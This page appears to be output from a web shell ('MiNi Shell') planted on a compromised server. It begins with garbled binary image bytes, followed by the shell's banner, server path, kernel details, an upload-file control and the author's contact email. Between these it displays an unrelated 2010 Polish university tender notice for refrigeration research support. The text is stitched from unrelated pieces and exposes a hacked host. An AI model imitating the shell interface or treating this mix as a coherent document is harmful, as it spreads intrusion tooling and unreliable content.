JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100805/238566-N-2010.html

<p class="kh_header"><b>Białystok: wykonanie prac o charakterze techniczno, pomocniczo - eksperckim 
w ramach projektu UDA-POIG.01.03.01-20-137/09-00 pt. Nowoczesne technologie dla sektora rolno spożywczego przy ograniczeniu emisji gazów cieplarnianych</b><br>
<b>Numer ogłoszenia: 238566 - 2010; data zamieszczenia: 05.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika  Białostocka , ul. Wiejska 45A, 15-351 Białystok, woj. podlaskie, tel. (085) 7469750, faks (085) 7469752.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pb.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie prac o charakterze techniczno, pomocniczo - eksperckim 
w ramach projektu UDA-POIG.01.03.01-20-137/09-00 pt. Nowoczesne technologie dla sektora rolno spożywczego przy ograniczeniu emisji gazów cieplarnianych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie prac o charakterze techniczno, pomocniczo - eksperckim 
w ramach projektu UDA-POIG.01.03.01-20-137/09-00 pt. Nowoczesne technologie dla sektora rolno spożywczego przy ograniczeniu emisji gazów cieplarnianych 
(kod CPV: 71356200-0 Usługi pomocy technicznej)

W ramach realizacji zadań przewiduje się wykonanie następujących zadań:
1.	Prace wykonywane przy budowie trzech stanowisk badawczych zgodnie z wymaganiami zawartymi w projekcie badawczym (do wglądu u kierownika projektu). Stanowiska te są unikalnymi stanowiskami do badania elementów propanowego urządzenia chłodniczego z innowacyjnym systemem sterowania. 
1.1.	wykonanie elementów dodatkowych torów pomiarowych w stanowisku badawczym propanowego układu chłodniczego;
1.2.	wykonanie elementów dodatkowych torów pomiarowych w stanowisku do badań minikanałowych powietrznych wymienników ciepła;
1.3.	wykonanie opisów zestawionych torów pomiarowych - wewnętrzna dokumentacja DTR;
1.4.	wykonywanie nastaw wstępnych urządzeń pomiarowych i sterujących pracujących w stanowisku badawczym propanowego układu chłodniczego; - dotyczy całego okresu trwania projektu;
1.5.	wykonywanie nastaw wstępnych urządzeń pomiarowych i sterujących pracujących w stanowisku do badań minikanałowych powietrznych wymienników ciepła; - dotyczy całego okresu trwania projektu;
1.6.	opis dokładności pomiarowych zestawionych torów akwizycji danych;

2.	Prace wykonywane przy torach pomiarowych oraz torów sterowania (automatyki) na stanowiskach badawczych. Tory pomiarowe muszą spełniać ogólnie przyjęte założenia dla torów pomiarowych o charakterystyce typowo naukowej, a co za tym idzie pomiary przepływu, temperatury, ciśnienia muszą odpowiadać odpowiednim standardom. 
2.1.	wykonywanie nastaw bieżących (wg. wymagań zespołu badawczego) urządzeń pomiarowych i sterujących pracujących w stanowisku badawczym propanowego układu chłodniczego - dotyczy całego okresu trwania projektu;
2.2.	wykonywanie nastaw bieżących (wg. wymagań zespołu badawczego) urządzeń pomiarowych i sterujących pracujących w stanowisku do badań minikanałowych powietrznych wymienników ciepła; - dotyczy całego okresu trwania projektu;
2.3.	konserwacja i utrzymanie systemu pomiarowego stanowiska badawczego propanowego układu chłodniczego, przez okres trwania projektu;
2.4.	konserwacja i utrzymanie systemu pomiarowego stanowiska do badań minikanałowych powietrznych wymienników ciepła, przez okres trwania projektu;
2.5.	lokalizacja i usuwanie usterek w systemach pomiarowych i sterujących stanowiska do badań minikanałowych powietrznych wymienników ciepła przez okres trwania projektu;
2.6.	lokalizacja i usuwanie usterek w systemach pomiarowych i sterujących stanowiska badawczego propanowego układu chłodniczego, przez okres trwania projektu;
2.7.	wykonywanie drobnych napraw stanowiska do badań minikanałowych powietrznych wymienników ciepła, przez okres trwania projektu;
2.8.	nadzór nad ekipami prowadzącymi prace w przypadku napraw których nie można wykonać we własnym zakresie na stanowisku do badań minikanałowych powietrznych wymienników ciepła, przez okres trwania projektu;
2.9.	wykonywanie drobnych napraw stanowiska badawczego propanowego układu chłodniczego, przez okres trwania projektu;
2.10.	nadzór nad ekipami prowadzącymi prace w przypadku napraw których nie można wykonać we własnym zakresie na stanowisku badawczym propanowego układu chłodniczego, przez okres trwania projektu;
2.11.	wszelkie inne czynności mogące wyniknąć w toku eksploatacji wyżej wymienionych stanowisk.

3.	Opracowanie i przeprowadzenie procedur kalibracyjnych dla zaproponowanych torów pomiarowych. Przeprowadzenie procedur kalibracyjnych zgodnie z założeniami i wymaganiami sztuki. Tory pomiarowe są wykonane w systemie firmy National Instruments. 
3.1.	pomoc w zestawieniu układów kalibracyjnych dla poszczególnych torów pomiarowych (w miarę potrzeby pomoc w przygotowanie założeń odpowiedniej dokumentacji ofertowej ilub przetargowej potrzebnej do uzupełnienia układów kalibracji);
3.2.	opis dokładności pomiarowych zestawionych układów kalibracji;
3.3.	udział w opracowaniu metodologii procedur kalibracji dla poszczególnych torów pomiarowych;
3.4.	opracowane wzoru protokołu kalibracji;
3.5.	pomoc w kalibracja torów pomiarowych temperatury, ciśnienia i, w miarę możliwości technicznych, strumienia masy w co najmniej siedmiu punktach zakresu pomiaru;
3.6.	pomoc w opracowaniu założeń procedur korekcyjnych uwzględniających kalibrację torów pomiarowych 
3.7.	sprawdzenie wskazań torów pomiarowych temperatury, ciśnienia i, w miarę możliwości technicznych, strumienia masy w co najmniej pięciu punktach zakresu pomiaru (poszczególne punkty nie mogą się pokrywać z punktami użytymi w procesie kalibracji);
3.8.	wstępna analiza niedokładności pomiaru wielkości fizycznych dla pojedynczego pomiaru i pomiaru uśrednionego odpowiednio po 10 i 100 próbkach;
3.9.	wszelkie inne czynności mogące wyniknąć w toku realizacji prac nad opracowaniem i przeprowadzeniem procedur kalibracyjnych dla zaproponowanych torów pomiarowych oraz torów sterowania na stanowiskach badawczych;

4.	Konsultacje projektu (adaptacji) komory doświadczalnej. Przeprowadzenie uzgodnień, nadzór nad wykonawstwem i uruchomieniem.
4.1.	przeprowadzenie wstępnych prac nad wariantami lokalizacji oraz wariantu budowy (wynajmu) doświadczalnej chłodni warzyw i przedstawienie ich kierownikowi projektu;
4.2.	przeprowadzenie wstępnych uzgodnień możliwości budowy (wynajmu) doświadczalnej chłodni warzyw z potencjalnymi partnerami przemysłowymi (właścicielami);
4.3.	opracowanie wstępnych uwarunkowań realizacyjnych dla poszczególnych lokalizacji 
i wariantów budowy (wynajmu) chłodni doświadczalnej oraz przedstawienie ich kierownikowi projektu;
4.4.	przeprowadzenie uzgodnień realizacyjnych z wykonawcami realizującymi budowę (modyfikacje) doświadczalnej chłodni. Współudział w uzgodnieniach z zakładem energetycznym, urzędem dozoru technicznego, etc.;
4.5.	przeprowadzenie wraz z innymi wykonawcami projektu programu prób zdawczych oraz udział w próbach zdawczych zbudowanej (zmodyfikowanej) chłodni;
4.6.	wszelkie inne czynności mogące wyniknąć w toku realizacji prac nad budową (wynajmem) doświadczalnej chłodni badawczej;

5.	Nadzór nad pracą komory doświadczalnej przez cały okres trwania projektu. Udział 
w przeprowadzeniu i opracowaniu wyników badań eksploatacyjnych. Ważnym elementem badań pracy niniejszej komory będą prace nad oceną stanu przechowywanych warzyw.
5.1.	nadzór wraz z innymi wykonawcami projektu nad pracą komory doświadczalnej przez cały okres trwania projektu. 
5.2.	prowadzenie wraz z innymi wykonawcami projektu pomiarów parametrów pracy doświadczalnej chłodni zgodnie z założeniami projektu (pomiary ciągłe w okresie określonym w harmonogramie projektu);
5.3.	kontrola i konserwacja systemu pomiarowego komory doświadczalnej;
5.4.	kontrola, konserwacja i regulacja układu chłodniczego komory doświadczalnej;
5.5.	nadzór nad załadunkiem komory doświadczalnej;
5.6.	wykonywanie drobnych napraw;
5.7.	nadzór nad ekipami prowadzącymi prace w przypadku napraw których nie można wykonać we własnym zakresie;
5.8.	wszelkie inne czynności mogące wyniknąć w toku eksploatacji komory doświadczalnej

Wykonawca będzie zobowiązany wykonywać zadania będące przedmiotem przetargu przez cały okres trwania projektu. Płatności będą dokonywane po każdym etapie. Zamawiający zastrzega sobie możliwość rezygnacji 
z usług  wykonawcy, jeśli nie wywiąże się on podczas trwania projektu z któregokolwiek z etapów. Rozliczenie poszczególnych etapów będzie oparte o raporty z ich realizacji, w których zostaną szczegółowo opisane prace wykonane w ramach rozliczanego etapu. 

Wymagania konieczne dla wykonawcy:
Wymagane zapoznanie się przez uczestnika postępowania przetargowego z harmonogramem 
i zakresem prac realizowanych w ramach projektu UDA-POIG.01.03.01-20-137/09-00 pt. Nowoczesne technologie dla sektora rolno spożywczego przy ograniczeniu emisji gazów cieplarnianych, 
w porozumieniu z kierownikiem projektu.
Prace związane z realizacją przetargu będą wykonywane u wszystkich konsorcjantów projektu. 
W związku z czym koszty dojazdu, zakwaterowania i wykonywania czynności u konsorcjantów ponosi wykonawca.
Wymagana dyspozycyjność (1dzień) w przypadku nieplanowanych kontroli stanu technicznego lub awarii sprzętu u każdego z konsorcjantów
W przypadku awarii systemu chłodzenia komory doświadczalnej wymagana dyspozycyjność (12 godzin) - ze względu na groźbę zniszczenia ładunku chłodni.
Podstawą wszczęcia procedury odbioru pracy będzie przedłożenie przez wykonawcę RAPORTU w formie opracowania dotyczącego przeprowadzonych prac.
Odbioru wykonanych prac będzie dokonywała komisja (3 osoby) powoływana przez Koordynatora Projektu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.62.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku:
a)	wykonawca oświadczy, że pracował min 3 lata w zespole projektowym w zakresie projektowania urządzeń chłodniczych do przechowywania warzyw i owoców; 
b)	wykonawca oświadczy, że posiada min. 5 lat doświadczenia w zakresie nadzoru nad eksploatacja urządzeń chłodniczych do przechowywania warzyw i owoców (prowadzenie działalności w/w zakresie lub praca związana z w/w działalnością.).
c)	wykonawca oświadczy, że brał udział w realizacji projektów badawczo-rozwojowych (np. wdrożeniowe zamówienia rządowe).
d)	wykonawca oświadczy, że pracował w zakresie szkolenia obsługi urządzeń chłodniczych,
e)	wykonawca oświadczy, że jest autorem lub współautorem co najmniej 3 publikacji 
o charakterze naukowo-technicznym w zakresie przechowywania warzyw i owoców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku:
a)	Wykonawca posiada co najmniej wyższe wykształcenie techniczne,
b)	Wykonawca oświadczy, że posiada  kwalifikacje do oceny stanu przechowywanych warzyw i owoców - (współpraca z jednostkami naukowo - badawczymi zajmującymi się przechowalnictwem warzyw 
i owoców, lub przedsiębiorstwami specjalizującymi się w przechowalnictwie warzyw i owoców),
c)	Wykonawca posiada świadectwo kwalifikacji w zakresie naprawy i obsługi technicznej urządzeń 
i instalacji chłodniczych,
d)	Wykonawca posiada świadectwo uprawnień audytora energetycznego,
e)	Wykonawca posiada świadectwo patentowe lub wzoru użytkowego dotyczące opracowywania konstrukcji urządzeń chłodniczych dla przemysłu spożywczego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>2)	Formularz ofertowy (wg załączonego wzoru druku - Załącznik nr 1),
3)	Kopia dyplomu potwierdzająca posiadanie co najmniej wyższego wykształcenia technicznego,
4)	kopia świadectwa kwalifikacji w zakresie naprawy i obsługi technicznej urządzeń i instalacji chłodniczych,
5)	kopia  świadectwa uprawnień audytora energetycznego,
6)	kopia świadectwa patentowego lub wzoru użytkowego dotyczące opracowywania konstrukcji urządzeń chłodniczych dla przemysłu spożywczego, 
7)	oświadczenie o zapoznaniu się z harmonogramem i zakresem prac realizowanych w ramach projektu UDA-POIG.01.03.01-20-137/09-00 pt. Nowoczesne technologie dla sektora rolno spożywczego przy ograniczeniu emisji gazów cieplarnianych, w porozumieniu z kierownikiem projektu (na druku Formularza ofertowego),
8)	oświadczenie o ponoszeniu wszelkich kosztów związanych z dojazdem, zakwaterowaniem i wykonywaniem czynności u konsorcjantów projektu (na druku Formularza ofertowego),
9)	oświadczenie o dyspozycyjności (1 dzień) w przypadku nieplanowanych kontroli stanu technicznego lub awarii sprzętu u każdego z konsorcjantów (na druku Formularza ofertowego),,
10)	oświadczenie o dyspozycyjności (12 godzin) w przypadku awarii systemu chłodzenia komory doświadczalnej (na druku Formularza ofertowego),
11)	oświadczenie o akceptacji zapisów zawartych w Załączniku Nr 3 do SIWZ - Wzór umowy (na druku Formularza ofertowego).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zaistnienia okoliczności nie leżących po obu Stronach, wykonywanie zamówienia nie było możliwe lub Strony miały w istotny sposób utrudnione możliwości w spełnianiu świadczenia, Strony mogą zwrócić się 
z uzasadnionym wnioskiem o przedłużenie terminu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pb.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Białostocka, Dział Zamówień Publicznych, ul. Zwierzyniecka 6 pok. 4, 15-333 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.08.2010 godzina 09:00, miejsce: Politechnika Białostocka, Dział Zamówień Publicznych, ul. Zwierzyniecka 6 pok. 4, 15-333 Białystok.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  nr  UDA-POIG.01.03.01-20-137/09-00 pt. Nowoczesne technologie dla sektora rolno - spożywczego przy ograniczaniu emisji gazów cieplarnianych 
 Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego oraz środków budżetu państwa w ramach 
Programu Operacyjnego Innowacyjna Gospodarka.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com